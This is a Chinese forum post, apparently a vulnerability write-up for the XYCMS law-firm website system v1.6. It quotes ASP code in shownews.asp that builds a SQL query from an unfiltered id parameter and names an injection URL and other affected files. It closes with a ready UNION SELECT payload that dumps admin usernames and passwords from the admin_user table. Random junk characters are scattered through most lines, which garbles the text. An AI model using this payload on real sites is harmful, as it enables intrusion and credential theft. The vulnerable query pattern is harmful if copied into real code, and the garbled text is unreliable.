前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似3 I! ]3 Y/ K" x/ O
% x' y% v A$ _ C; r7 v3 o
淫荡分割线! E! D" N4 e; u. X$ r3 e
--------------------------------------------------------" i( T1 P; j; m, I( i
" Z" k: G6 F" [* [2 |
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)/ O% O: j( e+ v7 }. w, b4 H
源码地址:http://down.chinaz.com/soft/29233.htm
" s* D8 f2 F$ A& ]" s. C
$ O- t0 B" j# _9 `# o6 G漏洞文件:shownews.asp! P8 E* F' p5 Q. O, @- r$ _
漏洞代码:7-13行
4 q7 V4 c% m }$ S$ j9 x7 t8 J3 z2 S
. ` ?0 ?* W, [/ c' R6 W* m - O0 b5 t# `2 M
<% - w, E0 R# B- u" H6 F/ O
id=request.QueryString("id")- |/ B" g1 D- L. ?7 x* K
* |8 W. {! s. L" i* C
set snews=server.createobject("adodb.recordset")
% G/ @* R. u6 z7 a' J- {exec="select * from [news] where id="&id
* E9 B+ ^" d- c9 b. I' Zsnews.open exec,conn,1,1+ R- B: z! n4 B; K7 K6 x
%>- T1 m5 ]% M; t
2 V& K2 g1 l1 p* L: t e9 K % P9 G' d# ?" c/ O9 s9 u7 Q
什么过滤都没有 直造成注入
/ L. ]: i$ `8 m/ H4 `1 ?( a
( K% y; U7 K, p5 S# B9 ~注入点:http://127.0.0.1:99/shownews.asp?id=xx
8 f# ^( F6 h7 X! K' w' U$ R1 ]
6 H6 R2 N1 w2 U8 H) O; {其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
7 i+ S0 L. Y0 T1 l : Z) X( m) j3 G# n" ]/ s- I3 ~: h
5 l1 q7 L$ l( W
exp: union select 1,admin,password,4,5,7 from admin_user# e9 I8 H( I) P( ` D9 W
4 w9 g2 t2 e& b
|